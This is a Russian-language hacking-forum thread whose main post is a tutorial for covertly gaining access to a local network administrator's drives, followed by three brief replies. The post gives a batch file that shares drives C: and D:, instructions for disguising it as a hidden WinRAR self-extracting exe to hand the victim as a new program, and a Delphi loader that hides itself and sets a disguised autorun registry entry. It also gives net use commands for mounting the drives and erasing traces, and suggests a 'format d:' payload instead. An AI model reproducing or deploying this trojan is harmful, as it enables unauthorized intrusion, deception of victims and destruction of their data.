Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 02-05, 03:03

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 4 ] 
Автор Сообщение
СообщениеДобавлено: 26-10, 18:56 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
Расшаренные ресурсы (shared resources) или по-нашему шары присутствуют почти в каждой локалке.
Представь ситуацию - злобный админ в локалке закрыл тебе доступ к своим дискам а тебе очень нужно незметно покапаться в его компе =) Сегодня я покажу тебе как легко решить эту проблему.

//ЧАСТЬ 1 - "крутая прога"//

Итак, ты пишешь bat файл следующего содержания:

@Echo off
net share disk_d=d: > nul
net share disk_c=c: > nul

Этим ты расшаришь диски C: и D: на компе админа.
Затем берешь мой любимый архиватор WINRAR и начинаешь колдовать =) :

1) Выбираешь метод сжатия - максимальный.
2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =)
3) Переходишь на вкладку "Дополнительно" - "Параметры SFX"
4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir%
5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки".
6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы".
7) На вкладке "Текст и значок" указываешь иконку будущего exe файла.
8) тыкаешь OK.
Итак, у тебя есть exe файл который ты можешь смело впаривать админу сетки под видом какой-нибудь новой проги =)

//ЧАСТЬ 2 - клиент//

Теперь напишим скрипт с помощью которого ты на своем компе будешь подключать сетевые диски админа =) Пишешь:

net use X: //имя компа админа/disk_d
net use Y: //имя компа админа/disk_c

И спокойно юзаешь его диски в свое удовольствие.
Чтобы замести следы (напимер при работе на компе общего доступа) используй:

net use X: /delete
net use Y: /delete

Есть одно препятствие: админ может увидеть посторонние расшаренные диски набрав команду net share в cmd.

Для большей надежности можно запускать это все таким образом:

1) Пишешь прогу (я пишу на delphi), запускающую твой батник.
2) Склеиваешь ее и батник описаным выше способом только в запуск после распаковки вместо батника прописываешь скомпиленый exe файл

Итак действуем.

1) Открываешь делфи и пишешь:

...
uses Windows, ShellAPI, Forms;
...
var
Form1: TForm1;
Reg : HKEY;
szPach: String ;
szName: String ;
y: string;

...
procedure TForm1.FormCreate(Sender: TObject);

begin

application.ShowMainForm:=false; //делаем наш загрузчик невидимым на панели задач и в диспетчере во вкладке "процессы" - ибо нех =)

begin
y:=ParamStr(0);
szName:='NTClock.exe'; //имя проги которое будет видно в редакторе реестра.
szPach:=y ;

//Создаешь ключ в реестре
RegCreateKey(HKEY_LOCAL_MACHINE, 'Software/Microsoft/Windows/CurrentVersion/Run', Reg);

//Создаешь параметр автозапуска
RegSetValueEx(Reg, PChar(szName) ,0 ,REG_SZ ,PChar(szPach), Length(szPach));

//Освобождаешь хендл
RegCloseKey(Reg);

begin

sleep(60000); // пауза в 1 мин (можно не делать)

ShellExecute(0, 'open', 'c:/WINDOWS/shara.bat', '', '', SW_HIDE); //запускаешь свой батник в скрытом режиме.

Application.Terminate; //закрываемся

end;
end;
end;

Как ты уже заметил я прописал наш загрузчик в реестр в раздел автозапуска. Теперь если даже админ и уберет расшареные диски, они у него будут расшариваться при каждом запуске системы =)
Здесь еще такая фича:
даже если админ пропалит автозапуск и полезет в реестр, то не всегда сможет понять где прописан злой процесс потому что не у каждого может вызвать сомнения прога под названием NTClock.exe =)

Также при желании можно заменить код батника на что нибудь вроде

@Echo off
format d: /q /y > nul

Все в твоих руках =)

Чуть не забыл, я поместил батник в папку windows т.к среднестатистический юзер там бывает редко. Поэтому при склеивании winrar'ом забей в путь %windir%


На этом все! Если будут вопросы, пиши на vadikus@front.ru

PS: это моя первая статья, поэтому прошу сильно не ругать если все это уже знают =).

_=V@DiKuS=_


_=V@DiKuS=_

hackzona.ru


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 06-12, 17:56 
Не в сети
Studing AH-user

Зарегистрирован: 30-10, 18:31
Сообщения: 35
Ну, для админов - ламаков сойдёт...)))

_________________
http://ah.flybb.ru


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 18-12, 17:06 
Не в сети
New AH-user
Аватара пользователя

Зарегистрирован: 16-09, 20:23
Сообщения: 2
Zonan
Да, ибо норм админ не будет под виндой сидеть, но с другой стороны ламак уже не будет админом => это не пройдёт.

_________________
Это пользователь для проверки функций форума.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 19-12, 22:12 
Не в сети
Serios AH-user
Аватара пользователя

Зарегистрирован: 26-10, 15:22
Сообщения: 274
Можно похимичить пока админ отойдет и всё.

_________________
P.S Это моё мнение навязывать я его нехочу и прошу критики без грубости.
Хочеш семизнак?..пройди по ссылке
Online Manga Reader


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 4 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB